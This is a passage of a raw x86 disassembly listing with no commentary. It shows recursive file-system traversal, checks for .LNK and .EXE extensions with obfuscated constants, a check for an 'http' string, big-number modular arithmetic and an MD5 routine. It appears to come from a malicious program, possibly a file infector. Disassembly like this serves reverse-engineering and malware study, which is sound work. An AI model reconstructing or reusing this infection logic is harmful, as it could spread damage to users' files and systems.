call dword ptr ds:10011634h
add esp, 10h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_423DBD: ; CODE XREF: sub_423CF4+CE�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_423DBD
mov edx, eax
movsx ecx, word ptr ds:100120E8h
movsx eax, word ptr ds:100121A8h
add ecx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_423E75
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_423DE7: ; CODE XREF: sub_423CF4+F8�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_423DE7
mov ecx, ds:100121B8h
add ecx, 1
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 4Ch
jnz short loc_423E75
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_423E13: ; CODE XREF: sub_423CF4+124�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_423E13
mov ecx, ds:10012118h
add ecx, 2
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 4Eh
jnz short loc_423E75
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_423E3F: ; CODE XREF: sub_423CF4+150�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_423E3F
mov ecx, ds:10012144h
add ecx, ds:100120CCh
sub ecx, 4
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 4Bh
jnz short loc_423E75
push esi
call sub_41E2FF
add esp, 4
loc_423E75: ; CODE XREF: sub_423CF4+E8�j
; sub_423CF4+118�j ...
mov ecx, esi
or eax, 0FFFFFFFFh
loc_423E7A: ; CODE XREF: sub_423CF4+18B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_423E7A
mov edx, eax
movsx ecx, word ptr ds:100121A8h
movsx eax, word ptr ds:10012154h
add ecx, eax
sub ecx, 3
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_423F37
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_423EA7: ; CODE XREF: sub_423CF4+1B8�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_423EA7
mov ecx, ds:10012190h
add ecx, 1
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 45h
jnz short loc_423F37
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_423ED3: ; CODE XREF: sub_423CF4+1E4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_423ED3
mov edx, eax
sub edx, ds:100121C0h
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 58h
jnz short loc_423F37
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_423EFA: ; CODE XREF: sub_423CF4+20B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_423EFA
movsx ecx, word ptr ds:10012180h
add ecx, ds:1001209Ch
sub ecx, 0Ch
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 45h
jnz short loc_423F37
push [ebp+var_248]
push esi
call sub_422E53
add esp, 8
loc_423F37: ; CODE XREF: sub_423CF4+1A8�j
; sub_423CF4+1D8�j ...
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call dword ptr ds:1000F258h
mov ebx, eax
movsx eax, word ptr ds:100120E0h
movsx edx, word ptr ds:10012154h
add eax, edx
sub eax, 7
neg eax
cmp ebx, eax
jz loc_42400E
cmp [ebp+var_112], 2Eh
jz loc_42400A
lea eax, [ebp+var_112]
push eax
push esi
push 10012769h
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10011634h
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_423CF4
add esp, 1Ch
jmp short loc_42400A
; ---------------------------------------------------------------------------
loc_423FA8: ; CODE XREF: sub_423CF4+318�j
lea eax, [ebp+var_13E]
push eax
push ebx
call dword ptr ds:1000D004h
mov edi, eax
or edi, edi
jnz short loc_423FD2
push [ebp+var_248]
call dword ptr ds:10011630h
pop ecx
push ebx
call dword ptr ds:1000E608h
jmp short loc_42400E
; ---------------------------------------------------------------------------
loc_423FD2: ; CODE XREF: sub_423CF4+2C6�j
cmp [ebp+var_112], 2Eh
jz short loc_42400A
lea eax, [ebp+var_112]
push eax
push esi
push 10012769h
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10011634h
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_423CF4
add esp, 1Ch
loc_42400A: ; CODE XREF: sub_423CF4+27D�j
; sub_423CF4+2B2�j ...
or edi, edi
jnz short loc_423FA8
loc_42400E: ; CODE XREF: sub_423CF4+270�j
; sub_423CF4+2DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_423CF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424013 proc near ; CODE XREF: sub_4232A3+120�p
var_270 = byte ptr -270h
var_26C = dword ptr -26Ch
var_267 = byte ptr -267h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 270h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000E5FCh
lea eax, [ebp+var_267]
push eax
call sub_41C3F2
push 10012764h
call sub_4228CE
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
lea eax, [ebp+var_267]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000C020h
push 1001275Ch
call sub_4228CE
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
add esp, 24h
push 0
mov eax, ds:10012174h
movsx edx, word ptr ds:10012090h
add eax, edx
sub eax, 0Ah
push eax
push 3
push 0
movsx eax, word ptr ds:100120D0h
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10011788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4240C3
mov eax, 2Ah
jmp short loc_42412C
; ---------------------------------------------------------------------------
loc_4240C3: ; CODE XREF: sub_424013+A7�j
push 0
lea eax, [ebp+var_270]
push eax
push 0FFh
lea eax, [ebp+var_203]
push eax
push edi
call dword ptr ds:1000C028h
mov [ebp+var_26C], eax
push edi
call dword ptr ds:10010650h
mov eax, ds:1001218Ch
add eax, ds:1001215Ch
sub eax, 5
cmp [ebp+var_26C], eax
jnz short loc_424109
mov eax, 2Ah
jmp short loc_42412C
; ---------------------------------------------------------------------------
loc_424109: ; CODE XREF: sub_424013+ED�j
movzx eax, [ebp+var_203]
movsx edx, word ptr ds:10012090h
add edx, 20h
cmp eax, edx
jge short loc_424125
mov eax, 2Ah
jmp short loc_42412C
; ---------------------------------------------------------------------------
loc_424125: ; CODE XREF: sub_424013+109�j
movzx eax, [ebp+var_203]
loc_42412C: ; CODE XREF: sub_424013+AE�j
; sub_424013+F4�j ...
pop edi
pop esi
leave
retn
sub_424013 endp
; =============== S U B R O U T I N E =======================================
sub_424130 proc near ; CODE XREF: sub_4223D9+270�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
movsx eax, word ptr ds:10012170h
dec eax
cmp ecx, eax
jge short loc_42416E
movsx eax, word ptr ds:10012180h
dec eax
imul ecx, eax
mov eax, ds:10012178h
sub eax, 2
mov edx, esi
add edx, eax
movsx eax, word ptr ds:10012090h
add eax, 3
imul edx, eax
sub ecx, edx
jmp loc_42429E
; ---------------------------------------------------------------------------
loc_42416E: ; CODE XREF: sub_424130+11�j
dec ecx
movsx eax, word ptr ds:10012090h
mov edx, ds:100120F8h
lea eax, [eax+edx+11h]
cmp ecx, eax
jge short loc_4241A5
mov eax, ds:1001212Ch
sub eax, 3
imul ecx, eax
mov eax, ecx
sub eax, esi
mov edx, ds:10012104h
add edx, 0Ah
mov ecx, eax
sub ecx, edx
jmp loc_42429E
; ---------------------------------------------------------------------------
loc_4241A5: ; CODE XREF: sub_424130+52�j
dec ecx
movsx eax, word ptr ds:10012110h
add eax, 1Eh
cmp ecx, eax
jge short loc_4241DA
mov eax, ds:10012184h
add eax, ds:10012130h
sub eax, 3
imul ecx, eax
mov eax, ds:10012178h
add eax, 3Ah
add eax, ds:10012144h
sub ecx, eax
jmp loc_42429E
; ---------------------------------------------------------------------------
loc_4241DA: ; CODE XREF: sub_424130+82�j
dec ecx
mov eax, ds:10012120h
add eax, 22h
cmp ecx, eax
jge short loc_424201
mov eax, ds:100121C4h
sub eax, 3
imul ecx, eax
mov eax, ds:100120B8h
add eax, 42h
sub ecx, eax
jmp loc_42429E
; ---------------------------------------------------------------------------
loc_424201: ; CODE XREF: sub_424130+B5�j
dec ecx
mov eax, ds:100121C0h
add eax, 24h
movsx edx, word ptr ds:100120E8h
add eax, edx
cmp ecx, eax
jge short loc_424235
mov eax, ds:100121C0h
dec eax
imul ecx, eax
mov eax, ds:100120FCh
add eax, 48h
movsx edx, word ptr ds:100120E8h
add eax, edx
sub ecx, eax
jmp short loc_42429E
; ---------------------------------------------------------------------------
loc_424235: ; CODE XREF: sub_424130+E5�j
dec ecx
mov eax, ds:10012178h
add eax, 30h
add eax, ds:100121B8h
cmp ecx, eax
jge short loc_424265
mov eax, ds:10012178h
add eax, ds:10012164h
dec eax
imul ecx, eax
movsx eax, word ptr ds:100120BCh
add eax, 61h
sub ecx, eax
jmp short loc_42429E
; ---------------------------------------------------------------------------
loc_424265: ; CODE XREF: sub_424130+116�j
dec ecx
movsx eax, word ptr ds:1001216Ch
lea eax, [eax+eax+31h]
cmp ecx, eax
jge short loc_42428E
mov eax, ds:1001212Ch
sub eax, 3
imul ecx, eax
movsx eax, word ptr ds:1001219Ch
add eax, 6Ah
sub ecx, eax
jmp short loc_42429E
; ---------------------------------------------------------------------------
loc_42428E: ; CODE XREF: sub_424130+143�j
mov eax, ds:1001212Ch
add eax, 30h
add eax, ds:100120B8h
sub ecx, eax
loc_42429E: ; CODE XREF: sub_424130+39�j
; sub_424130+70�j ...
mov eax, ecx
pop esi
retn
sub_424130 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4242A2 proc near ; CODE XREF: .data:004229F0�p
var_10034 = dword ptr -10034h
var_10030 = byte ptr -10030h
var_1002C = dword ptr -1002Ch
var_10028 = dword ptr -10028h
var_10024 = dword ptr -10024h
var_10020 = byte ptr -10020h
var_10018 = dword ptr -10018h
var_10010 = dword ptr -10010h
var_1000C = dword ptr -1000Ch
var_10008 = dword ptr -10008h
var_10003 = byte ptr -10003h
var_10002 = byte ptr -10002h
var_10001 = byte ptr -10001h
var_10000 = byte ptr -10000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10034h
call sub_424F4D
push ebx
push esi
push edi
cmp dword ptr ds:100122B0h, 0
jnz short loc_4242CF
mov eax, ds:1001214Ch
add eax, 4
cmp ds:1000E61Ch, eax
jb loc_4244FE
loc_4242CF: ; CODE XREF: sub_4242A2+17�j
lea eax, [ebp+var_10020]
push eax
call dword ptr ds:1000C038h
lea eax, [ebp+var_10030]
push eax
lea eax, [ebp+var_10020]
push eax
push 9
mov eax, ds:100120F8h
sub eax, 2
push eax
push [ebp+arg_0]
call dword ptr ds:1000F254h
mov edi, eax
mov eax, ds:10012190h
add eax, ds:10012098h
sub eax, 0Ah
cmp edi, eax
jnz loc_4244FE
mov esi, [ebp+var_10018]
and [ebp+var_1000C], 0
lea eax, [ebp+var_1000C]
push eax
push 1001397Ch
push esi
mov edx, [esi]
call dword ptr ds:0[edx]
mov edi, eax
mov eax, ds:100121C0h
sub eax, 3
cmp edi, eax
jnz loc_4244FE
lea eax, [ebp+var_10024]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+78h]
mov edi, eax
cmp edi, ds:100121A4h
jnz loc_4244F8
lea eax, [ebp+var_10003]
push eax
push [ebp+var_10024]
call sub_41ADCD
add esp, 8
mov edx, eax
inc edx
mov [ebp+var_10034], edx
push [ebp+var_10024]
call dword ptr ds:10011BA0h
cmp [ebp+var_10003], 68h
jnz short loc_4243BA
cmp [ebp+var_10002], 74h
jnz short loc_4243BA
cmp [ebp+var_10001], 74h
jnz short loc_4243BA
cmp [ebp+var_10000], 70h
jz short loc_4243BF
loc_4243BA: ; CODE XREF: sub_4242A2+FB�j
; sub_4242A2+104�j ...
jmp loc_4244F8
; ---------------------------------------------------------------------------
loc_4243BF: ; CODE XREF: sub_4242A2+116�j
lea eax, [ebp+var_10010]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov edi, eax
mov eax, ds:10012160h
add eax, ds:10012158h
sub eax, 8
cmp edi, eax
jnz loc_4244F8
lea eax, [ebp+var_4]
push eax
push 100138FCh
mov eax, [ebp+var_10010]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov edi, eax
mov eax, ds:100120B4h
sub eax, 8
cmp edi, eax
jnz loc_4244EC
lea eax, [ebp+var_10008]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+1B0h]
mov edi, eax
mov eax, ds:100120E4h
add eax, ds:10012144h
sub eax, 7
cmp edi, eax
jnz loc_4244E3
lea eax, [ebp+var_10028]
push eax
mov eax, [ebp+var_10008]
push eax
mov edx, [eax]
call dword ptr [edx+70h]
mov edi, eax
movsx eax, word ptr ds:10012128h
add eax, ds:100120F8h
sub eax, 2
cmp edi, eax
jz short loc_424477
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
jmp short loc_4244E3
; ---------------------------------------------------------------------------
loc_424477: ; CODE XREF: sub_4242A2+1C5�j
xor ebx, ebx
mov eax, [ebp+var_10028]
cmp [ebp+var_10008], eax
jz short loc_42448A
xor ebx, ebx
inc ebx
loc_42448A: ; CODE XREF: sub_4242A2+1E3�j
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
mov eax, [ebp+var_10028]
push eax
mov eax, [eax]
call dword ptr [eax+8]
or ebx, ebx
jnz short loc_4244E3
lea eax, [ebp+var_1002C]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov edi, eax
mov eax, ds:100120A8h
sub eax, 3
cmp edi, eax
jnz short loc_4244E3
push [ebp+var_1002C]
push [ebp+var_4]
call nullsub_1
push [ebp+var_1002C]
push [ebp+var_4]
call sub_423996
add esp, 10h
loc_4244E3: ; CODE XREF: sub_4242A2+198�j
; sub_4242A2+1D3�j ...
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_4244EC: ; CODE XREF: sub_4242A2+16D�j
mov eax, [ebp+var_10010]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_4244F8: ; CODE XREF: sub_4242A2+C4�j
; sub_4242A2:loc_4243BA�j ...
push esi
mov eax, [esi]
call dword ptr [eax+8]
loc_4244FE: ; CODE XREF: sub_4242A2+27�j
; sub_4242A2+6E�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4242A2 endp
; ---------------------------------------------------------------------------
db 90h
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424505 proc near ; CODE XREF: sub_41B3A8+13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, ds:100139CCh
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_4245D0
xor edx, edx
loc_424535: ; CODE XREF: sub_424505+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_424547
mov edx, [ebp+arg_4]
call sub_424561
loc_424547: ; CODE XREF: sub_424505+38�j
lea edx, ds:100139CCh
call sub_424561
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_424535
popa
pop ebp
retn 10h
sub_424505 endp
; ---------------------------------------------------------------------------
dw 8B2Eh
db 0C0h
; =============== S U B R O U T I N E =======================================
sub_424561 proc near ; CODE XREF: sub_424505+3D�p
; sub_424505+48�p
lea edi, ds:1001398Ch
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, ds:100139CCh
call sub_4245D0
loc_42457B: ; CODE XREF: sub_424561+5D�j
lea edi, ds:1001398Ch
mov ecx, 10h
xor eax, eax
loc_424588: ; CODE XREF: sub_424561+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_424588
call sub_4245E1
bt ds:100139CCh, ebx
jnb short loc_4245BD
mov esi, edx
lea edi, ds:1001398Ch
xor eax, eax
mov ecx, 10h
loc_4245AC: ; CODE XREF: sub_424561+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_4245AC
call sub_4245E1
loc_4245BD: ; CODE XREF: sub_424561+3A�j
dec ebx
jns short loc_42457B
mov edi, edx
lea esi, ds:1001398Ch
mov ecx, 10h
rep movsd
retn
sub_424561 endp
; =============== S U B R O U T I N E =======================================
sub_4245D0 proc near ; CODE XREF: sub_424505+29�p
; sub_424561+15�p
mov ebx, 1FFh
loc_4245D5: ; CODE XREF: sub_4245D0+B�j
bt [edi], ebx
jb short locret_4245DD
dec ebx
jnz short loc_4245D5
locret_4245DD: ; CODE XREF: sub_4245D0+8�j
retn
sub_4245D0 endp
; ---------------------------------------------------------------------------
dw 8B2Eh
db 0C0h
; =============== S U B R O U T I N E =======================================
sub_4245E1 proc near ; CODE XREF: sub_424561+2E�p
; sub_424561+57�p
lea esi, ds:1001398Ch
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_4245EF: ; CODE XREF: sub_4245E1+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_424618
ja short loc_4245FC
dec ecx
jns short loc_4245EF
loc_4245FC: ; CODE XREF: sub_4245E1+16�j
mov esi, [ebp+14h]
lea edi, ds:1001398Ch
xor eax, eax
mov ecx, 10h
loc_42460C: ; CODE XREF: sub_4245E1+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_42460C
locret_424618: ; CODE XREF: sub_4245E1+14�j
retn
sub_4245E1 endp
; =============== S U B R O U T I N E =======================================
sub_424619 proc near ; CODE XREF: sub_42466A+32�p
; sub_42466A+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_424619 endp
; =============== S U B R O U T I N E =======================================
sub_424626 proc near ; CODE XREF: sub_42466A+219�p
; sub_42466A+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_424626 endp
; =============== S U B R O U T I N E =======================================
sub_424633 proc near ; CODE XREF: sub_42466A+420�p
; sub_42466A+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_424633 endp
; =============== S U B R O U T I N E =======================================
sub_42463A proc near ; CODE XREF: sub_42466A+627�p
; sub_42466A+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_42463A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424643 proc near ; CODE XREF: sub_41C68E+6D�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_424643 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42466A proc near ; CODE XREF: sub_41C68E+8C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov ds:10013A0Ch, eax
mov eax, [edi+4]
mov ds:10013A10h, eax
mov eax, [edi+8]
mov ds:10013A14h, eax
mov eax, [edi+0Ch]
mov ds:10013A18h, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424619
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424619
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424619
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424619
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424619
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424619
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424619
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424619
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424619
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424619
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424619
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424619
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424619
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424619
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424619
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424626
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424626
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424626
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424626
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424626
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424626
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424626
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424626
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424626
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424626
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424626
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424626
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424626
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424626
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424626
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424626
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424633
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424633
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424633
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424633
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424633
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424633
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424633
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424633
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424633
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424633
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
